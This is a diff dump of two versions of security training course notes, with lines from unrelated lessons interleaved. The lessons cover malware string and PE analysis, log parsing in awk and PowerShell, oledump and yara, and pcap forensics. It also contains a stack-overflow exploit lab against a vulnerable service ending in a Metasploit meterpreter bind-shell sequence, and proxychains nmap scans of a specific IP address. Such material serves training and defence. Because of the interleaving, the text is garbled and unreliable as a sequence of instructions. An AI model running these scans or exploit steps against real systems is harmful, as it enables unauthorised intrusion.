691	-	strings wannacry.exe \| grep -i irc
691	+
692
693	-	strings wannacry.exe \| grep -i join
693	+
694		----------------------------------------------------------------------
695	-	strings wannacry.exe \| grep -i admin
695	+	vi ~/toolz/fix-proxychains-dns.sh
696
697	-	strings wannacry.exe \| grep -i list
697	+	#!/bin/bash
698		# This script is called by proxychains to resolve DNS names
699		# DNS server used to resolve names
700	-	pe info wannacry.exe
700	+	# Reference: http://carnal0wnage.attackresearch.com/2013/09/changing-proxychains-hardcoded-dns.html
701	-	pe check wannacry.exe
701	+	DNS_SERVER=4.2.2.2
702	-	pe dump --section text wannacry.exe
702	+
703	-	pe dump --section data wannacry.exe
703	+	if [ $# = 0 ] ; then
704	-	pe dump --section rsrc wannacry.exe
704	+	echo " usage:"
705	-	pe dump --section reloc wannacry.exe
705	+	echo " proxyresolv <hostname> "
706	-	strings rdata \| less
706	+	exit
707	-	strings rsrc \| less
707	+	fi
708	-	strings text \| less
708	+
709		export LD_PRELOAD=libproxychains.so.3
710		dig $1 @$DNS_SERVER +tcp \| awk '/A.+[0-9]+\.[0-9]+\.[0-9]/{print $5;}'
711		-----------------------------------------------------------------------
712	-	wget https://pastebin.com/raw/guxzCBmP
712	+
713
714		sudo ntpdate pool.ntp.org
715	-	cp guxzCBmP am.py
715	+
716		tor-resolve strategicsec.com
717
718	-	nano am.py
718	+	proxychains nmap -sT -p80 204.244.123.113
719
720	-	python am.py wannacry.exe
720	+	proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 204.244.123.113
721
722
723	-	##############################################
723	+	If you want to block tor exit nodes you get a list from here:
724	-	# Log Analysis with Linux command-line tools #
724	+	http://rules.emergingthreats.net/blockrules/emerging-tor-BLOCK.rules
725	-	##############################################
725	+
726	-	The following command line executables are found in the Mac as well as most Linux Distributions.
726	+	You probably should also block things like:
727		http://rules.emergingthreats.net/blockrules/emerging-rbn-BLOCK.rules <----- Russian Business Network IPs
728	-	cat – prints the content of a file in the terminal window
728	+	http://rules.emergingthreats.net/blockrules/emerging-botcc.rules <----- BotNet Command and Control Servers
729	-	grep – searches and filters based on patterns
729	+	http://rules.emergingthreats.net/blockrules/emerging-rbn-malvertisers-BLOCK.rules <----- Malware Advertisers
730	-	awk – can sort each row into fields and display only what is needed
730	+
731	-	sed – performs find and replace functions
731	+	Here is where you can download the perl script to automatically update your firewall each day (create a cron job for it).
732	-	sort – arranges output in an order
732	+	http://doc.emergingthreats.net/bin/view/Main/EmergingFirewallRules
733	-	uniq – compares adjacent lines and can report, filter or provide a count of duplicates
733	+
734
735
736
737	-	# Cisco Logs #
737	+
738
739
740	-	AWK Basics
740	+	######################
741	-	----------
741	+	# Simple Exploit Dev #
742	-	To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
742	+	######################
743
744	-	-----------------------------Type this-----------------------------------------
744	+	- Inside of your Windows7 VM - download the following file to the Desktop:
745	-	cat cisco.log \| awk '{print $5}' \| tail -n 4
745	+	https://s3.amazonaws.com/StrategicSec-Files/SimpleExploitLab.zip
746	-	-------------------------------------------------------------------------------
746	+
747		- Extract this zip file to your Desktop
748
749		- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
750	-	Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
750	+
751		- Open a new command prompt and type:
752	-	-----------------------------Type this-----------------------------------------
752	+
753	-	cat cisco.log \| awk '{print $5}'\| sort \| uniq -c \| sort -rn
753	+
754	-	-------------------------------------------------------------------------------
754	+
755		HELP
756
757		- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
758	-	While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
758	+
759
760	-	-----------------------------Type this-----------------------------------------
760	+
761	-	cat cisco.log \| grep %[a-zA-Z]-[0-9]-[a-zA-Z] \| awk '{print $5}' \| sort \| uniq -c \| sort -rn
761	+
762	-	-------------------------------------------------------------------------------
762	+
763
764		- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
765
766		- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
767	-	Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
767	+
768		- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
769	-	-----------------------------Type this-----------------------------------------
769	+
770	-	cat cisco.log \| grep %LINEPROTO-5-UPDOWN:
770	+
771
772	-	cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| awk '{print $10}' \| sort \| uniq -c \| sort -rn
772	+
773
774	-	cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| sed 's/,//g' \| awk '{print $10}' \| sort \| uniq -c \| sort -rn
774	+
775		- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
776	-	cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| sed 's/,//g' \| awk '{print $10 " changed to " $14}' \| sort \| uniq -c \| sort -rn
776	+
777	-	--------------------------------------------------------------------------------
777	+
778		- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
779		- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
780	-	#######################################
780	+
781	-	# Dealing with macro embedded malware #
781	+
782	-	#######################################
782	+
783
784		6-jmp-esp.py
785	-	---------------------------Type This-----------------------------------
785	+
786	-	cd ~/malware
786	+
787		7-first-exploit
788		- In this script we actually do the stack overflow and launch a bind shell on port 4444
789
790		8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
791	-	-----------------------------------------------------------------------
791	+
792
793		------------------------------
794
795	-	- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
795	+	cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
796	-	- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
796	+
797		vi vulnserv.rb
798	-	---------------------------Type This-----------------------------------
798	+
799
800
801		cd ~/toolz/metasploit
802
803		./msfconsole
804	-	---------------------------Type This-----------------------------------
804	+
805
806
807	-	- Look for "GVhkjbjv" and you should see:
807	+	use exploit/windows/misc/vulnserv
808		set PAYLOAD windows/meterpreter/bind_tcp
809		set RHOST 192.168.153.133
810		set RPORT 9999
811		exploit
812
813
814
815
816	-	#####################
816	+
817	-	# Powershell Basics #
817	+	# InfoSec Program Development #
818	-	#####################
818	+
819		Download this file for program development walk-through:
820	-	PowerShell is Microsoft's new scripting language that has been built in since the release Vista.
820	+	https://s3.amazonaws.com/StrategicSec-Files/Build-InfoSec-Assessment-Capability.zip
821
822	-	PowerShell file extension end in .ps1 .
822	+
823
824	-	An important note is that you cannot double click on a PowerShell script to execute it.
824	+
825
826	-	To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
826	+
827
828	-	------------------------Type This------------------------------
828	+
829	-	cd c:\
829	+	# Download the Analysis VM #
830	-	dir
830	+
831	-	cd
831	+	https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu-v3.zip
832		user: malware
833	-	---------------------------------------------------------------
833	+	pass: malware
834
835
836	-	To obtain a list of cmdlets, use the Get-Command cmdlet
836	+	- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
837	-	------------------------Type This------------------------------
837	+
838	-	Get-Command
838	+
839	-	---------------------------------------------------------------
839	+
840		cd Desktop/
841
842	-	You can use the Get-Alias cmdlet to see a full list of aliased commands.
842	+
843	-	------------------------Type This------------------------------
843	+
844	-	Get-Alias
844	+
845	-	---------------------------------------------------------------
845	+	wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
846		wget https://s3.amazonaws.com/StrategicSec-Files/analyse_malware.py
847
848	-	Don't worry you won't blow up your machine with Powershell
848	+
849	-	------------------------Type This------------------------------
849	+	infected
850	-	Get-Process \| stop-process Don't press [ ENTER ] What will this command do?
850	+
851	-	Get-Process \| stop-process -whatif
851	+
852	-	---------------------------------------------------------------
852	+
853		mv malware.exe malware.pdf
854	-	To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
854	+
855	-	------------------------Type This------------------------------
855	+
856	-	Get-Help Get-Command
856	+
857		mv malware.pdf malware.exe
858	-	Get-Help Get-Service –online
858	+
859		hexdump -n 2 -C malware.exe
860	-	Get-Service -Name TermService, Spooler
860	+
861		*What is '4d 5a' or 'MZ'*
862	-	Get-Service –N BITS
862	+	Reference:
863	-	---------------------------------------------------------------
863	+
864
865
866		objdump -x malware.exe
867
868		strings malware.exe
869	-	- Run cmdlet through a pie and refer to its properties as $_
869	+
870	-	------------------------Type This------------------------------
870	+
871	-	Get-Service \| where-object { $_.Status -eq "Running"}
871	+
872	-	---------------------------------------------------------------
872	+
873
874		strings malware.exe \| grep -i library
875
876	-	- PowerShell variables begin with the $ symbol. First lets create a variable
876	+
877	-	------------------------Type This------------------------------
877	+
878	-	$serv = Get-Service –N Spooler
878	+
879	-	---------------------------------------------------------------
879	+
880		strings malware.exe \| grep -i hku
881	-	To see the value of a variable you can just call it in the terminal.
881	+
882	-	------------------------Type This------------------------------
882	+	- We didn't see anything like HKLM, HKCU or other registry type stuff
883	-	$serv
883	+
884		strings malware.exe \| grep -i irc
885	-	$serv.gettype().fullname
885	+
886	-	---------------------------------------------------------------
886	+	strings malware.exe \| grep -i join
887
888		strings malware.exe \| grep -i admin
889	-	Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
889	+
890	-	------------------------Type This------------------------------
890	+
891	-	$serv \| Get-Member
891	+
892
893	-	Get-Member -InputObject $serv
893	+	- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
894	-	---------------------------------------------------------------
894	+
895		sudo apt-get install -y python-pefile
896
897		vi analyse_malware.py
898
899	-	Let's use a method and a property with our object.
899	+
900	-	------------------------Type This------------------------------
900	+
901	-	$serv.Status
901	+
902	-	$serv.Stop()
902	+
903	-	$serv.Refresh()
903	+
904	-	$serv.Status
904	+
905	-	$serv.Start()
905	+
906	-	$serv.Refresh()
906	+
907	-	$serv.Status
907	+
908	-	---------------------------------------------------------------
908	+
909		cd ~/Desktop/malwarescanner
910
911	-	If you want some good command-line shortcuts you can check out the following link:
911	+
912	-	https://technet.microsoft.com/en-us/library/ff678293.aspx
912	+
913		unzip master.zip
914
915	-	# Simple Event Log Analysis #
915	+
916
917	-	Let's setup a directory to work in:
917	+
918	-	------------------------Type This------------------------------
918	+
919	-	cd c:\
919	+
920
921	-	mkdir ps
921	+
922
923	-	cd ps
923	+
924	-	---------------------------------------------------------------
924	+
925		cp ~/Desktop/malware.exe ~/Desktop/malcode
926	-	Step 1: Dump the event logs
926	+
927	-	---------------------------
927	+	python scanner.py -H hashes.txt -D /home/malware/Desktop/malcode/ strings.txt
928	-	The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
928	+
929		cp ~/Desktop/
930	-	To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
930	+
931	-	If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
931	+
932	-	------------------------Type This------------------------------
932	+
933	-	Get-EventLog -LogName application \| Export-Clixml Applog.xml
933	+
934		# Analyzing Macro Embedded Malware #
935	-	type .\Applog.xml
935	+
936		# https://jon.glass/analyzes-dridex-malware-p1/ #
937	-	$logs = "system","application","security"
937	+
938	-	---------------------------------------------------------------
938	+	cp ~/Desktop/
939
940		- Create a FREE account on:
941	-	The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
941	+	https://malwr.com/account/signup/
942	-	------------------------Type This------------------------------
942	+
943	-	$logs \| % { get-eventlog -LogName $_ \| Export-Clixml "$_.xml" }
943	+	- Grab the malware from:
944	-	---------------------------------------------------------------
944	+	https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
945
946		file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
947
948		cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
949	-	Step 2: Import the event log of interest
949	+
950	-	----------------------------------------
950	+
951	-	To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
951	+
952	-	Store the results in a variable.
952	+
953	-	Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
953	+
954
955	-	The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
955	+
956	-	------------------------Type This------------------------------
956	+
957	-	$seclog = Import-Clixml security.xml
957	+
958
959	-	$seclog \| select -Last 5
959	+
960	-	---------------------------------------------------------------
960	+
961		unzip oledump_V0_0_22.zip
962	-	Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
962	+
963	-	------------------------Type This------------------------------
963	+	cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
964	-	Get-EventLog Application -After (Get-Date).AddDays(-1)
964	+
965	-	---------------------------------------------------------------
965	+	mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
966	-	You can use '-after' and '-before' to filter date ranges
966	+
967		python oledump.py 064016.doc
968	-	One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
968	+
969	-	By default, an ordinary user does not have permission to read the security log.
969	+
970
971		- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
972		- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
973
974	-	Step 3: Drill into a specific entry
974	+
975		python oledump.py 064016.doc -s A5 -v
976	-	To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
976	+
977		- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
978	-	------------------------Type This------------------------------
978	+
979	-	$seclog \| select -first 1 \| fl *
979	+
980	-	---------------------------------------------------------------
980	+
981
982	-	The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
982	+	- Look for "GVhkjbjv" and you should see:
983
984	-	------------------------Type This------------------------------
984	+
985	-	($seclog \| select -first 1).message
985	+
986		- Take that long blob that starts with 636D and finishes with 653B and paste it in:
987	-	(($seclog \| select -first 1).message).gettype()
987	+
988	-	---------------------------------------------------------------
988	+
989
990
991	-	In the *nix world you often want a count of something (wc -l).
991	+
992	-	How often is the SeSecurityPrivilege privilege mentioned in the message property?
992	+
993	-	To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
993	+	# Yara Ninja #
994	-	------------------------Type This------------------------------
994	+
995	-	$seclog \| ? { $_.message -match 'SeSecurityPrivilege'} \| measure
995	+	sudo apt-get remove -y yara
996	-	---------------------------------------------------------------
996	+
997	-	If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
997	+	wget https://github.com/plusvic/yara/archive/v3.4.0.zip
998
999	-	------------------------Type This------------------------------
999	+	sudo apt-get -y install libtool
1000	-	$seclog \| ? { $_.message -match 'SeSecurityPrivilege'} \| group eventid
1000	+
1001	-	---------------------------------------------------------------
1001	+	unzip v3.4.0.zip
1002
1003	-	Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
1003	+	cd yara-3.4.0
1004	-	Use the count property to determine the total number of entries in the event log.
1004	+
1005	-	------------------------Type This------------------------------
1005	+	./bootstrap.sh
1006	-	$seclog.Count
1006	+
1007	-	---------------------------------------------------------------
1007	+	./configure
1008
1009		make
1010
1011		sudo make install
1012
1013		yara -v
1014	-	# Simple Log File Analysis #
1014	+
1015		cd ..
1016
1017		wget https://github.com/Yara-Rules/rules/archive/master.zip
1018	-	You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
1018	+
1019		unzip master.zip
1020	-	------------------------Type This------------------------------
1020	+
1021	-	cd c:\ps
1021	+	cd ~/Desktop
1022	-	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
1022	+
1023	-	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
1023	+	yara rules-master/packer.yar malcode/malware.exe
1024	-	Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
1024	+
1025	-	---------------------------------------------------------------
1025	+
1026		Places to get more Yara rules:
1027		------------------------------
1028		https://malwareconfig.com/static/yaraRules/
1029	-	The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
1029	+	https://github.com/kevthehermit/YaraRules
1030	-	------------------------Type This------------------------------
1030	+	https://github.com/VectraThreatLab/reyara
1031	-	Select-String 192.168.208.63 .\CiscoLogFileExamples.txt \| select line
1031	+
1032	-	---------------------------------------------------------------
1032	+
1033
1034		Yara rule sorting script:
1035		-------------------------
1036	-	To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
1036	+	https://github.com/mkayoh/yarasorter
1037	-	------------------------Type This------------------------------
1037	+
1038	-	Select-String 192.168.208.63 .\CiscoLogFileExamples.txt \| select line \| Measure-Object
1038	+
1039	-	---------------------------------------------------------------
1039	+
1040		cd ~/Desktop/rules-master
1041		for i in $( ls --hide=master.yar ); do echo include \"$i\";done > master.yar
1042	-	To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
1042	+
1043	-	------------------------Type This------------------------------
1043	+	yara rules-master/master.yar malcode/malware.exe
1044	-	Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select -ExpandProperty value \| Sort-Object -Unique \| Measure-Object
1044	+
1045	-	---------------------------------------------------------------
1045	+
1046
1047
1048	-	Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
1048	+
1049	-	------------------------Type This------------------------------
1049	+
1050	-	Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select -ExpandProperty value \| Sort-Object -Unique
1050	+
1051	-	---------------------------------------------------------------
1051	+
1052
1053	-	In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
1053	+
1054	-	This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
1054	+	Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
1055	-	------------------------Type This------------------------------
1055	+	http://derekmorton.name/files/malware_12-14-12.sql.bz2
1056	-	Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select value \| group value \| sort count -des
1056	+
1057	-	---------------------------------------------------------------
1057	+
1058		Malware Repositories:
1059		http://malshare.com/index.php
1060		http://www.malwareblacklist.com/
1061	-	##############################################
1061	+	http://www.virusign.com/
1062	-	# Parsing Log files using windows PowerShell #
1062	+	http://virusshare.com/
1063	-	##############################################
1063	+	http://www.tekdefense.com/downloads/malware-samples/
1064
1065	-	Download the sample IIS log http://pastebin.com/LBn64cyA
1065	+
1066
1067	-	------------------------Type This------------------------------
1067	+
1068	-	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
1068	+
1069		# Creating a Malware Database #
1070	-	Get-Content ".\*log" \| ? { ($_ \| Select-String "WebDAV")}
1070	+
1071	-	---------------------------------------------------------------
1071	+
1072		Creating a malware database (sqlite)
1073		------------------------------------
1074	-	The above command would give us all the WebDAV requests.
1074	+	sudo apt-get install -y python-simplejson python-simplejson-dbg
1075		wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
1076	-	To filter this to a particular user name, use the below command:
1076	+	wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
1077	-	------------------------Type This------------------------------
1077	+
1078	-	Get-Content ".\*log" \| ? { ($_ \| Select-String "WebDAV") -and ($_ \| Select-String "OPTIONS")}
1078	+	infected
1079	-	---------------------------------------------------------------
1079	+	python avsubmit.py --init
1080		python avsubmit.py -f malware.exe -e
1081
1082	-	Some more options that will be more commonly required :
1082	+
1083
1084	-	For Outlook Web Access : Replace WebDAV with OWA
1084	+
1085
1086	-	For EAS : Replace WebDAV with Microsoft-server-activesync
1086	+	Creating a malware database (mysql)
1087		-----------------------------------
1088	-	For ECP : Replace WebDAV with ECP
1088	+	- Step 1: Installing MySQL database
1089		- Run the following command in the terminal:
1090
1091		sudo apt-get install mysql-server
1092
1093		- Step 2: Installing Python MySQLdb module
1094		- Run the following command in the terminal:
1095
1096	-	####################################################################
1096	+	sudo apt-get build-dep python-mysqldb
1097	-	# Windows PowerShell: Extracting Strings Using Regular Expressions #
1097	+	sudo apt-get install python-mysqldb
1098	-	####################################################################
1098	+
1099		Step 3: Logging in
1100		Run the following command in the terminal:
1101	-	Regex Characters you might run into:
1101	+
1102		mysql -u root -p (set a password of 'malware')
1103	-	^ Start of string, or start of line in a multiline pattern
1103	+
1104	-	$ End of string, or start of line in a multiline pattern
1104	+	- Then create one database by running following command:
1105	-	\b Word boundary
1105	+
1106	-	\d Digit
1106	+	create database malware;
1107	-	\ Escape the following character
1107	+
1108	-	* 0 or more {3} Exactly 3
1108	+	exit;
1109	-	+ 1 or more {3,} 3 or more
1109	+
1110	-	? 0 or 1 {3,5} 3, 4 or 5
1110	+	wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
1111
1112		vi mal_to_db.py (fill in database connection information)
1113
1114	-	To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
1114	+	python mal_to_db.py -i
1115
1116	-	1) The input file that will be parsed
1116	+	python mal_to_db.py -f malware.exe -u
1117	-	------------------------Type This------------------------------
1117	+
1118	-	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
1118	+
1119	-	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
1119	+	mysql -u root -p
1120	-	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
1120	+	malware
1121	-	---------------------------------------------------------------
1121	+
1122	-	2) The regular expression that the input file will be compared against
1122	+	mysql> use malware;
1123
1124	-	3) The output file for where the extracted data will be placed.
1124	+	select id,md5,sha1,sha256,time FROM files;
1125
1126	-	Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
1126	+	mysql> quit;
1127	-	Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
1127	+
1128
1129	-	To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
1129	+
1130	-	------------------------Type This------------------------------
1130	+
1131	-	$input_path = 'c:\ps\emails.txt'
1131	+
1132	-	$output_file = 'c:\ps\extracted_addresses.txt'
1132	+
1133	-	$regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
1133	+
1134	-	select-string -Path $input_path -Pattern $regex -AllMatches \| % { $_.Matches } \| % { $_.Value } > $output_file
1134	+
1135	-	---------------------------------------------------------------
1135	+	cd /home/malware/Desktop/Browser\ Forensics
1136
1137		ls \| grep pcap
1138	-	In this script, we have the following variables:
1138	+
1139		perl chaosreader.pl suspicious-time.pcap
1140	-	1) $input_path to hold the path to the input file we want to parse
1140	+
1141		firefox index.html
1142	-	2) $output_file to hold the path to the file we want the results to be stored in
1142	+
1143		cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)"
1144	-	3) $regex to hold the regular expression pattern to be used when the strings are being matched.
1144	+
1145		cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)" \| awk '{print $4, $5, $6}' \| sort \| uniq -c \| sort -nr
1146	-	The select-string cmdlet contains various parameters as follows:
1146	+
1147		sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
1148	-	1) "-Path" which takes as input the full path to the input file
1148	+
1149
1150	-	2) "-Pattern" which takes as input the regular expression used in the matching process
1150	+	for i in session_00[0-9]*.www.html; do srcip=`cat "$i" \| grep 'www:\ ' \| awk '{print $2}' \| cut -d ':' -f1`; dstip=`cat "$i" \| grep 'www:\ ' \| awk '{print $4}' \| cut -d ':' -f1`; host=`cat "$i" \| grep 'Host:\ ' \| sort -u \| sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done \| sort -u
1151
1152	-	3) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.
1152	+
1153
1154	-	Using ">" the results are written to the destination specified in the $output_file variable.
1154	+
1155
1156	-	Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
1156	+
1157		# PCAP Analysis with tshark #
1158	-	IP addresses
1158	+
1159	-	------------
1159	+
1160	-	For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
1160	+
1161	-	------------------------Type This------------------------------
1161	+
1162	-	$input_path = 'c:\ps\ip_addresses.txt'
1162	+
1163	-	$output_file = 'c:\ps\extracted_ip_addresses.txt'
1163	+
1164	-	$regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
1164	+
1165	-	select-string -Path $input_path -Pattern $regex -AllMatches \| % { $_.Matches } \| % { $_.Value } > $output_file
1165	+
1166	-	---------------------------------------------------------------
1166	+
1167
1168		tshark –r suspicious-time.pcap -Tfields -e “eth.src” \| sort \| uniq
1169
1170	-	URLs
1170	+
1171	-	----
1171	+
1172	-	For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
1172	+
1173	-	You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
1173	+
1174	-	------------------------Type This------------------------------
1174	+
1175	-	$input_path = 'c:\ps\URL_addresses.txt'
1175	+
1176	-	$output_file = 'c:\ps\extracted_URL_addresses.txt'
1176	+
1177	-	$regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=])?'
1177	+
1178	-	select-string -Path $input_path -Pattern $regex -AllMatches \| % { $_.Matches } \| % { $_.Value } > $output_file
1178	+
1179	-	---------------------------------------------------------------
1179	+
1180
1181	-	In addition to the examples above, many other types of strings can be extracted using this script.
1181	+
1182	-	All you need to do is switch the regular expression in the "$regex" variable!
1182	+
1183	-	In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
1183	+
1184		whois sploitme.com.cn
1185
1186
1187		tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
1188
1189		tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri \| awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' \| grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
1190	-	########################################
1190	+
1191	-	# Basic Network Commands in PowerShell #
1191	+
1192	-	########################################
1192	+
1193		tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
1194	-	Reference:
1194	+
1195	-	https://blogs.technet.microsoft.com/josebda/2015/04/18/windows-powershell-equivalents-for-common-networking-commands-ipconfig-ping-nslookup/
1195	+
1196
1197
1198
1199	-	# Pentester Tasks #
1199	+
1200		# PCAP Analysis with forensicPCAP.py #
1201	-	Reference:
1201	+
1202	-	http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
1202	+	cd ~/Desktop
1203		wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
1204		sudo easy_install cmd2
1205	-	Listing IPs
1205	+
1206	-	-----------
1206	+	python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
1207	-	One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one
1207	+
1208		ForPCAP >>> help
1209	-	------------------------Type This------------------------------
1209	+
1210	-	$octect = "149.28.201."
1210	+
1211	-	$lastoctect = (1..255)
1211	+
1212	-	$lastoctect \| ForEach-Object {write-host "$($octect)$($_)"}
1212	+
1213	-	---------------------------------------------------------------
1213	+
1214
1215		Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
1216	-	Ping Sweep
1216	+
1217	-	------------------------------------------------------
1217	+
